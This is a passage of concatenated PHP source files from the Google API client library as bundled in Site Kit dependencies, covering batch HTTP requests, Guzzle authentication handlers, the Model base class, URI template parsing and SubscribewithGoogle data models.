$batchPath; public function __construct(\Google\Site_Kit_Dependencies\Google\Client $client, $boundary = \false, $rootUrl = null, $batchPath = null) { $this->client = $client; $this->boundary = $boundary ?: \mt_rand(); $rootUrl = \rtrim($rootUrl ?: $this->client->getConfig('base_path'), '/'); $this->rootUrl = \str_replace('UNIVERSE_DOMAIN', $this->client->getUniverseDomain(), $rootUrl); $this->batchPath = $batchPath ?: self::BATCH_PATH; } public function add(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, $key = \false) { if (\false == $key) { $key = \mt_rand(); } $this->requests[$key] = $request; } public function execute() { $body = ''; $classes = []; $batchHttpTemplate = <<<EOF --%s Content-Type: application/http Content-Transfer-Encoding: binary MIME-Version: 1.0 Content-ID: %s %s %s%s EOF; /** @var RequestInterface $request */ foreach ($this->requests as $key => $request) { $firstLine = \sprintf('%s %s HTTP/%s', $request->getMethod(), $request->getRequestTarget(), $request->getProtocolVersion()); $content = (string) $request->getBody(); $headers = ''; foreach ($request->getHeaders() as $name => $values) { $headers .= \sprintf("%s:%s\r\n", $name, \implode(', ', $values)); } $body .= \sprintf($batchHttpTemplate, $this->boundary, $key, $firstLine, $headers, $content ? "\n" . $content : ''); $classes['response-' . $key] = $request->getHeaderLine('X-Php-Expected-Class'); } $body .= "--{$this->boundary}--"; $body = \trim($body); $url = $this->rootUrl . '/' . $this->batchPath; $headers = ['Content-Type' => \sprintf('multipart/mixed; boundary=%s', $this->boundary), 'Content-Length' => (string) \strlen($body)]; $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('POST', $url, $headers, $body); $response = $this->client->execute($request); return $this->parseResponse($response, $classes); } public function parseResponse(\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response, $classes = []) { $contentType = $response->getHeaderLine('content-type'); $contentType = \explode(';', $contentType); $boundary = \false; foreach ($contentType as $part) { $part = \explode('=', $part, 2); if (isset($part[0]) && 'boundary' == \trim($part[0])) { $boundary = $part[1]; } } $body = (string) $response->getBody(); if (!empty($body)) { $body = \str_replace("--{$boundary}--", "--{$boundary}", $body); $parts = \explode("--{$boundary}", $body); $responses = []; $requests = \array_values($this->requests); foreach ($parts as $i => $part) { $part = \trim($part); if (!empty($part)) { list($rawHeaders, $part) = \explode("\r\n\r\n", $part, 2); $headers = $this->parseRawHeaders($rawHeaders); $status = \substr($part, 0, \strpos($part, "\n")); $status = \explode(" ", $status); $status = $status[1]; list($partHeaders, $partBody) = $this->parseHttpResponse($part, 0); $response = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response((int) $status, $partHeaders, \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($partBody)); // Need content id. $key = $headers['content-id']; try { $response = \Google\Site_Kit_Dependencies\Google\Http\REST::decodeHttpResponse($response, $requests[$i - 1]); } catch (\Google\Site_Kit_Dependencies\Google\Service\Exception $e) { // Store the exception as the response, so successful responses // can be processed. $response = $e; } $responses[$key] = $response; } } return $responses; } return null; } private function parseRawHeaders($rawHeaders) { $headers = []; $responseHeaderLines = \explode("\r\n", $rawHeaders); foreach ($responseHeaderLines as $headerLine) { if ($headerLine && \strpos($headerLine, ':') !== \false) { list($header, $value) = \explode(': ', $headerLine, 2); $header = \strtolower($header); if (isset($headers[$header])) { $headers[$header] = \array_merge((array) $headers[$header], (array) $value); } else { $headers[$header] = $value; } } } return $headers; } /** * Used by the IO lib and also the batch processing. * * @param string $respData * @param int $headerSize * @return array */ private function parseHttpResponse($respData, $headerSize) { // check proxy header foreach (self::$CONNECTION_ESTABLISHED_HEADERS as $established_header) { if (\stripos($respData, $established_header) !== \false) { // existed, remove it $respData = \str_ireplace($established_header, '', $respData); // Subtract the proxy header size unless the cURL bug prior to 7.30.0 // is present which prevented the proxy header size from being taken into // account. // @TODO look into this // if (!$this->needsQuirk()) { // $headerSize -= strlen($established_header); // } break; } } if ($headerSize) { $responseBody = \substr($respData, $headerSize); $responseHeaders = \substr($respData, 0, $headerSize); } else { $responseSegments = \explode("\r\n\r\n", $respData, 2); $responseHeaders = $responseSegments[0]; $responseBody = isset($responseSegments[1]) ? $responseSegments[1] : null; } $responseHeaders = $this->parseRawHeaders($responseHeaders); return [$responseHeaders, $responseBody]; } } <?php /* * Copyright 2013 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google; use Exception as BaseException; class Exception extends \Exception { } <?php namespace Google\Site_Kit_Dependencies\Google\AuthHandler; use Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader; use Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\Google\Auth\Middleware\AuthTokenMiddleware; use Google\Site_Kit_Dependencies\Google\Auth\Middleware\ScopedAccessTokenMiddleware; use Google\Site_Kit_Dependencies\Google\Auth\Middleware\SimpleMiddleware; use Google\Site_Kit_Dependencies\GuzzleHttp\Client; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; /** * This supports Guzzle 6 */ class Guzzle6AuthHandler { protected $cache; protected $cacheConfig; public function __construct(?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null, array $cacheConfig = []) { $this->cache = $cache; $this->cacheConfig = $cacheConfig; } public function attachCredentials(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http, \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader $credentials, ?callable $tokenCallback = null) { // use the provided cache if ($this->cache) { $credentials = new \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache($credentials, $this->cacheConfig, $this->cache); } return $this->attachCredentialsCache($http, $credentials, $tokenCallback); } public function attachCredentialsCache(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http, \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache $credentials, ?callable $tokenCallback = null) { // if we end up needing to make an HTTP request to retrieve credentials, we // can use our existing one, but we need to throw exceptions so the error // bubbles up. $authHttp = $this->createAuthHttp($http); $authHttpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build($authHttp); $middleware = new \Google\Site_Kit_Dependencies\Google\Auth\Middleware\AuthTokenMiddleware($credentials, $authHttpHandler, $tokenCallback); $config = $http->getConfig(); $config['handler']->remove('google_auth'); $config['handler']->push($middleware, 'google_auth'); $config['auth'] = 'google_auth'; $http = new \Google\Site_Kit_Dependencies\GuzzleHttp\Client($config); return $http; } public function attachToken(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http, array $token, array $scopes) { $tokenFunc = function ($scopes) use($token) { return $token['access_token']; }; $middleware = new \Google\Site_Kit_Dependencies\Google\Auth\Middleware\ScopedAccessTokenMiddleware($tokenFunc, $scopes, $this->cacheConfig, $this->cache); $config = $http->getConfig(); $config['handler']->remove('google_auth'); $config['handler']->push($middleware, 'google_auth'); $config['auth'] = 'scoped'; $http = new \Google\Site_Kit_Dependencies\GuzzleHttp\Client($config); return $http; } public function attachKey(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http, $key) { $middleware = new \Google\Site_Kit_Dependencies\Google\Auth\Middleware\SimpleMiddleware(['key' => $key]); $config = $http->getConfig(); $config['handler']->remove('google_auth'); $config['handler']->push($middleware, 'google_auth'); $config['auth'] = 'simple'; $http = new \Google\Site_Kit_Dependencies\GuzzleHttp\Client($config); return $http; } private function createAuthHttp(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http) { return new \Google\Site_Kit_Dependencies\GuzzleHttp\Client(['http_errors' => \true] + $http->getConfig()); } } <?php /** * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\AuthHandler; /** * This supports Guzzle 7 */ class Guzzle7AuthHandler extends \Google\Site_Kit_Dependencies\Google\AuthHandler\Guzzle6AuthHandler { } <?php /** * Copyright 2015 Google Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\AuthHandler; use Exception; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; class AuthHandlerFactory { /** * Builds out a default http handler for the installed version of guzzle. * * @return Guzzle6AuthHandler|Guzzle7AuthHandler * @throws Exception */ public static function build($cache = null, array $cacheConfig = []) { $guzzleVersion = null; if (\defined('\\Google\\Site_Kit_Dependencies\\GuzzleHttp\\ClientInterface::MAJOR_VERSION')) { $guzzleVersion = \Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface::MAJOR_VERSION; } elseif (\defined('\\Google\\Site_Kit_Dependencies\\GuzzleHttp\\ClientInterface::VERSION')) { $guzzleVersion = (int) \substr(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface::VERSION, 0, 1); } switch ($guzzleVersion) { case 6: return new \Google\Site_Kit_Dependencies\Google\AuthHandler\Guzzle6AuthHandler($cache, $cacheConfig); case 7: return new \Google\Site_Kit_Dependencies\Google\AuthHandler\Guzzle7AuthHandler($cache, $cacheConfig); default: throw new \Exception('Version not supported'); } } } <?php /* * Copyright 2011 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google; use Google\Site_Kit_Dependencies\Google\Exception as GoogleException; use ReflectionObject; use ReflectionProperty; use stdClass; /** * This class defines attributes, valid values, and usage which is generated * from a given json schema. * http://tools.ietf.org/html/draft-zyp-json-schema-03#section-5 * */ #[\AllowDynamicProperties] class Model implements \ArrayAccess { /** * If you need to specify a NULL JSON value, use Google\Model::NULL_VALUE * instead - it will be replaced when converting to JSON with a real null. */ const NULL_VALUE = "{}gapi-php-null"; protected $internal_gapi_mappings = []; protected $modelData = []; protected $processed = []; /** * Polymorphic - accepts a variable number of arguments dependent * on the type of the model subclass. */ public final function __construct() { if (\func_num_args() == 1 && \is_array(\func_get_arg(0))) { // Initialize the model with the array's contents. $array = \func_get_arg(0); $this->mapTypes($array); } $this->gapiInit(); } /** * Getter that handles passthrough access to the data array, and lazy object creation. * @param string $key Property name. * @return mixed The value if any, or null. */ public function __get($key) { $keyType = $this->keyType($key); $keyDataType = $this->dataType($key); if ($keyType && !isset($this->processed[$key])) { if (isset($this->modelData[$key])) { $val = $this->modelData[$key]; } elseif ($keyDataType == 'array' || $keyDataType == 'map') { $val = []; } else { $val = null; } if ($this->isAssociativeArray($val)) { if ($keyDataType && 'map' == $keyDataType) { foreach ($val as $arrayKey => $arrayItem) { $this->modelData[$key][$arrayKey] = new $keyType($arrayItem); } } else { $this->modelData[$key] = new $keyType($val); } } elseif (\is_array($val)) { $arrayObject = []; foreach ($val as $arrayIndex => $arrayItem) { $arrayObject[$arrayIndex] = new $keyType($arrayItem); } $this->modelData[$key] = $arrayObject; } $this->processed[$key] = \true; } return isset($this->modelData[$key]) ? $this->modelData[$key] : null; } /** * Initialize this object's properties from an array. * * @param array $array Used to seed this object's properties. * @return void */ protected function mapTypes($array) { // Hard initialise simple types, lazy load more complex ones. foreach ($array as $key => $val) { if ($keyType = $this->keyType($key)) { $dataType = $this->dataType($key); if ($dataType == 'array' || $dataType == 'map') { $this->{$key} = []; foreach ($val as $itemKey => $itemVal) { if ($itemVal instanceof $keyType) { $this->{$key}[$itemKey] = $itemVal; } else { $this->{$key}[$itemKey] = new $keyType($itemVal); } } } elseif ($val instanceof $keyType) { $this->{$key} = $val; } else { $this->{$key} = new $keyType($val); } unset($array[$key]); } elseif (\property_exists($this, $key)) { $this->{$key} = $val; unset($array[$key]); } elseif (\property_exists($this, $camelKey = $this->camelCase($key))) { // This checks if property exists as camelCase, leaving it in array as snake_case // in case of backwards compatibility issues. $this->{$camelKey} = $val; } } $this->modelData = $array; } /** * Blank initialiser to be used in subclasses to do post-construction initialisation - this * avoids the need for subclasses to have to implement the variadics handling in their * constructors. */ protected function gapiInit() { return; } /** * Create a simplified object suitable for straightforward * conversion to JSON. This is relatively expensive * due to the usage of reflection, but shouldn't be called * a whole lot, and is the most straightforward way to filter. */ public function toSimpleObject() { $object = new \stdClass(); // Process all other data. foreach ($this->modelData as $key => $val) { $result = $this->getSimpleValue($val); if ($result !== null) { $object->{$key} = $this->nullPlaceholderCheck($result); } } // Process all public properties. $reflect = new \ReflectionObject($this); $props = $reflect->getProperties(\ReflectionProperty::IS_PUBLIC); foreach ($props as $member) { $name = $member->getName(); $result = $this->getSimpleValue($this->{$name}); if ($result !== null) { $name = $this->getMappedName($name); $object->{$name} = $this->nullPlaceholderCheck($result); } } return $object; } /** * Handle different types of values, primarily * other objects and map and array data types. */ private function getSimpleValue($value) { if ($value instanceof \Google\Site_Kit_Dependencies\Google\Model) { return $value->toSimpleObject(); } elseif (\is_array($value)) { $return = []; foreach ($value as $key => $a_value) { $a_value = $this->getSimpleValue($a_value); if ($a_value !== null) { $key = $this->getMappedName($key); $return[$key] = $this->nullPlaceholderCheck($a_value); } } return $return; } return $value; } /** * Check whether the value is the null placeholder and return true null. */ private function nullPlaceholderCheck($value) { if ($value === self::NULL_VALUE) { return null; } return $value; } /** * If there is an internal name mapping, use that. */ private function getMappedName($key) { if (isset($this->internal_gapi_mappings, $this->internal_gapi_mappings[$key])) { $key = $this->internal_gapi_mappings[$key]; } return $key; } /** * Returns true only if the array is associative. * @param array $array * @return bool True if the array is associative. */ protected function isAssociativeArray($array) { if (!\is_array($array)) { return \false; } $keys = \array_keys($array); foreach ($keys as $key) { if (\is_string($key)) { return \true; } } return \false; } /** * Verify if $obj is an array. * @throws \Google\Exception Thrown if $obj isn't an array. * @param array $obj Items that should be validated. * @param string $method Method expecting an array as an argument. */ public function assertIsArray($obj, $method) { if ($obj && !\is_array($obj)) { throw new \Google\Site_Kit_Dependencies\Google\Exception("Incorrect parameter type passed to {$method}(). Expected an array."); } } /** @return bool */ #[\ReturnTypeWillChange] public function offsetExists($offset) { return isset($this->{$offset}) || isset($this->modelData[$offset]); } /** @return mixed */ #[\ReturnTypeWillChange] public function offsetGet($offset) { return isset($this->{$offset}) ? $this->{$offset} : $this->__get($offset); } /** @return void */ #[\ReturnTypeWillChange] public function offsetSet($offset, $value) { if (\property_exists($this, $offset)) { $this->{$offset} = $value; } else { $this->modelData[$offset] = $value; $this->processed[$offset] = \true; } } /** @return void */ #[\ReturnTypeWillChange] public function offsetUnset($offset) { unset($this->modelData[$offset]); } protected function keyType($key) { $keyType = $key . "Type"; // ensure keyType is a valid class if (\property_exists($this, $keyType) && $this->{$keyType} !== null && \class_exists($this->{$keyType})) { return $this->{$keyType}; } } protected function dataType($key) { $dataType = $key . "DataType"; if (\property_exists($this, $dataType)) { return $this->{$dataType}; } } public function __isset($key) { return isset($this->modelData[$key]); } public function __unset($key) { unset($this->modelData[$key]); } /** * Convert a string to camelCase * @param string $value * @return string */ private function camelCase($value) { $value = \ucwords(\str_replace(['-', '_'], ' ', $value)); $value = \str_replace(' ', '', $value); $value[0] = \strtolower($value[0]); return $value; } } <?php /* * Copyright 2013 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Utils; /** * Implementation of levels 1-3 of the URI Template spec. * @see http://tools.ietf.org/html/rfc6570 */ class UriTemplate { const TYPE_MAP = "1"; const TYPE_LIST = "2"; const TYPE_SCALAR = "4"; /** * @var array $operators * These are valid at the start of a template block to * modify the way in which the variables inside are * processed. */ private $operators = ["+" => "reserved", "/" => "segments", "." => "dotprefix", "#" => "fragment", ";" => "semicolon", "?" => "form", "&" => "continuation"]; /** * @var array<string> * These are the characters which should not be URL encoded in reserved * strings. */ private $reserved = ["=", ",", "!", "@", "|", ":", "/", "?", "#", "[", "]", '$', "&", "'", "(", ")", "*", "+", ";"]; private $reservedEncoded = ["%3D", "%2C", "%21", "%40", "%7C", "%3A", "%2F", "%3F", "%23", "%5B", "%5D", "%24", "%26", "%27", "%28", "%29", "%2A", "%2B", "%3B"]; public function parse($string, array $parameters) { return $this->resolveNextSection($string, $parameters); } /** * This function finds the first matching {...} block and * executes the replacement. It then calls itself to find * subsequent blocks, if any. */ private function resolveNextSection($string, $parameters) { $start = \strpos($string, "{"); if ($start === \false) { return $string; } $end = \strpos($string, "}"); if ($end === \false) { return $string; } $string = $this->replace($string, $start, $end, $parameters); return $this->resolveNextSection($string, $parameters); } private function replace($string, $start, $end, $parameters) { // We know a data block will have {} round it, so we can strip that. $data = \substr($string, $start + 1, $end - $start - 1); // If the first character is one of the reserved operators, it effects // the processing of the stream. if (isset($this->operators[$data[0]])) { $op = $this->operators[$data[0]]; $data = \substr($data, 1); $prefix = ""; $prefix_on_missing = \false; switch ($op) { case "reserved": // Reserved means certain characters should not be URL encoded $data = $this->replaceVars($data, $parameters, ",", null, \true); break; case "fragment": // Comma separated with fragment prefix. Bare values only. $prefix = "#"; $prefix_on_missing = \true; $data = $this->replaceVars($data, $parameters, ",", null, \true); break; case "segments": // Slash separated data. Bare values only. $prefix = "/"; $data = $this->replaceVars($data, $parameters, "/"); break; case "dotprefix": // Dot separated data. Bare values only. $prefix = "."; $prefix_on_missing = \true; $data = $this->replaceVars($data, $parameters, "."); break; case "semicolon": // Semicolon prefixed and separated. Uses the key name $prefix = ";"; $data = $this->replaceVars($data, $parameters, ";", "=", \false, \true, \false); break; case "form": // Standard URL format. Uses the key name $prefix = "?"; $data = $this->replaceVars($data, $parameters, "&", "="); break; case "continuation": // Standard URL, but with leading ampersand. Uses key name. $prefix = "&"; $data = $this->replaceVars($data, $parameters, "&", "="); break; } // Add the initial prefix character if data is valid. if ($data || $data !== \false && $prefix_on_missing) { $data = $prefix . $data; } } else { // If no operator we replace with the defaults. $data = $this->replaceVars($data, $parameters); } // This is chops out the {...} and replaces with the new section. return \substr($string, 0, $start) . $data . \substr($string, $end + 1); } private function replaceVars($section, $parameters, $sep = ",", $combine = null, $reserved = \false, $tag_empty = \false, $combine_on_empty = \true) { if (\strpos($section, ",") === \false) { // If we only have a single value, we can immediately process. return $this->combine($section, $parameters, $sep, $combine, $reserved, $tag_empty, $combine_on_empty); } else { // If we have multiple values, we need to split and loop over them. // Each is treated individually, then glued together with the // separator character. $vars = \explode(",", $section); return $this->combineList( $vars, $sep, $parameters, $combine, $reserved, \false, // Never emit empty strings in multi-param replacements $combine_on_empty ); } } public function combine($key, $parameters, $sep, $combine, $reserved, $tag_empty, $combine_on_empty) { $length = \false; $explode = \false; $skip_final_combine = \false; $value = \false; // Check for length restriction. if (\strpos($key, ":") !== \false) { list($key, $length) = \explode(":", $key); } // Check for explode parameter. if ($key[\strlen($key) - 1] == "*") { $explode = \true; $key = \substr($key, 0, -1); $skip_final_combine = \true; } // Define the list separator. $list_sep = $explode ? $sep : ","; if (isset($parameters[$key])) { $data_type = $this->getDataType($parameters[$key]); switch ($data_type) { case self::TYPE_SCALAR: $value = $this->getValue($parameters[$key], $length); break; case self::TYPE_LIST: $values = []; foreach ($parameters[$key] as $pkey => $pvalue) { $pvalue = $this->getValue($pvalue, $length); if ($combine && $explode) { $values[$pkey] = $key . $combine . $pvalue; } else { $values[$pkey] = $pvalue; } } $value = \implode($list_sep, $values); if ($value == '') { return ''; } break; case self::TYPE_MAP: $values = []; foreach ($parameters[$key] as $pkey => $pvalue) { $pvalue = $this->getValue($pvalue, $length); if ($explode) { $pkey = $this->getValue($pkey, $length); $values[] = $pkey . "=" . $pvalue; // Explode triggers = combine. } else { $values[] = $pkey; $values[] = $pvalue; } } $value = \implode($list_sep, $values); if ($value == '') { return \false; } break; } } elseif ($tag_empty) { // If we are just indicating empty values with their key name, return that. return $key; } else { // Otherwise we can skip this variable due to not being defined. return \false; } if ($reserved) { $value = \str_replace($this->reservedEncoded, $this->reserved, $value); } // If we do not need to include the key name, we just return the raw // value. if (!$combine || $skip_final_combine) { return $value; } // Else we combine the key name: foo=bar, if value is not the empty string. return $key . ($value != '' || $combine_on_empty ? $combine . $value : ''); } /** * Return the type of a passed in value */ private function getDataType($data) { if (\is_array($data)) { \reset($data); if (\key($data) !== 0) { return self::TYPE_MAP; } return self::TYPE_LIST; } return self::TYPE_SCALAR; } /** * Utility function that merges multiple combine calls * for multi-key templates. */ private function combineList($vars, $sep, $parameters, $combine, $reserved, $tag_empty, $combine_on_empty) { $ret = []; foreach ($vars as $var) { $response = $this->combine($var, $parameters, $sep, $combine, $reserved, $tag_empty, $combine_on_empty); if ($response === \false) { continue; } $ret[] = $response; } return \implode($sep, $ret); } /** * Utility function to encode and trim values */ private function getValue($value, $length) { if ($length) { $value = \substr($value, 0, $length); } $value = \rawurlencode($value); return $value; } } <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class WaitingToRecurDetails extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $freeTrial; /** * @var string */ public $nextRecurrenceTime; /** * @param bool */ public function setFreeTrial($freeTrial) { $this->freeTrial = $freeTrial; } /** * @return bool */ public function getFreeTrial() { return $this->freeTrial; } /** * @param string */ public function setNextRecurrenceTime($nextRecurrenceTime) { $this->nextRecurrenceTime = $nextRecurrenceTime; } /** * @return string */ public function getNextRecurrenceTime() { return $this->nextRecurrenceTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\WaitingToRecurDetails::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_WaitingToRecurDetails'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class RecurrenceTerms extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountOnHoldMillis; protected $freeTrialPeriodType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurrenceDuration::class; protected $freeTrialPeriodDataType = ''; /** * @var string */ public $gracePeriodMillis; protected $recurrencePeriodType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurrenceDuration::class; protected $recurrencePeriodDataType = ''; /** * @param string */ public function setAccountOnHoldMillis($accountOnHoldMillis) { $this->accountOnHoldMillis = $accountOnHoldMillis; } /** * @return string */ public function getAccountOnHoldMillis() { return $this->accountOnHoldMillis; } /** * @param RecurrenceDuration */ public function setFreeTrialPeriod(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurrenceDuration $freeTrialPeriod) { $this->freeTrialPeriod = $freeTrialPeriod; } /** * @return RecurrenceDuration */ public function getFreeTrialPeriod() { return $this->freeTrialPeriod; } /** * @param string */ public function setGracePeriodMillis($gracePeriodMillis) { $this->gracePeriodMillis = $gracePeriodMillis; } /** * @return string */ public function getGracePeriodMillis() { return $this->gracePeriodMillis; } /** * @param RecurrenceDuration */ public function setRecurrencePeriod(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurrenceDuration $recurrencePeriod) { $this->recurrencePeriod = $recurrencePeriod; } /** * @return RecurrenceDuration */ public function getRecurrencePeriod() { return $this->recurrencePeriod; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurrenceTerms::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_RecurrenceTerms'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class UserEntitlementsPlan extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'planEntitlements'; /** * @var string */ public $name; protected $planEntitlementsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PlanEntitlement::class; protected $planEntitlementsDataType = 'array'; /** * @var string */ public $planId; /** * @var string */ public $planType; /** * @var string */ public $publicationId; protected $purchaseInfoType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PurchaseInfo::class; protected $purchaseInfoDataType = ''; /** * @var string */ public $readerId; protected $recurringPlanDetailsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurringPlanDetails::class; protected $recurringPlanDetailsDataType = ''; /** * @var string */ public $userId; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param PlanEntitlement[] */ public function setPlanEntitlements($planEntitlements) { $this->planEntitlements = $planEntitlements; } /** * @return PlanEntitlement[] */ public function getPlanEntitlements() { return $this->planEntitlements; } /** * @param string */ public function setPlanId($planId) { $this->planId = $planId; } /** * @return string */ public function getPlanId() { return $this->planId; } /** * @param string */ public function setPlanType($planType) { $this->planType = $planType; } /** * @return string */ public function getPlanType() { return $this->planType; } /** * @param string */ public function setPublicationId($publicationId) { $this->publicationId = $publicationId; } /** * @return string */ public function getPublicationId() { return $this->publicationId; } /** * @param PurchaseInfo */ public function setPurchaseInfo(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PurchaseInfo $purchaseInfo) { $this->purchaseInfo = $purchaseInfo; } /** * @return PurchaseInfo */ public function getPurchaseInfo() { return $this->purchaseInfo; } /** * @param string */ public function setReaderId($readerId) { $this->readerId = $readerId; } /** * @return string */ public function getReaderId() { return $this->readerId; } /** * @param RecurringPlanDetails */ public function setRecurringPlanDetails(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurringPlanDetails $recurringPlanDetails) { $this->recurringPlanDetails = $recurringPlanDetails; } /** * @return RecurringPlanDetails */ public function getRecurringPlanDetails() { return $this->recurringPlanDetails; } /** * @param string */ public function setUserId($userId) { $this->userId = $userId; } /** * @return string */ public function getUserId() { return $this->userId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\UserEntitlementsPlan::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_UserEntitlementsPlan'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class RecurrenceDuration extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $count; /** * @var string */ public $unit; /** * @param int */ public function setCount($count) { $this->count = $count; } /** * @return int */ public function getCount() { return $this->count; } /** * @param string */ public function setUnit($unit) { $this->unit = $unit; } /** * @return string */ public function getUnit() { return $this->unit; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurrenceDuration::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_RecurrenceDuration'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the 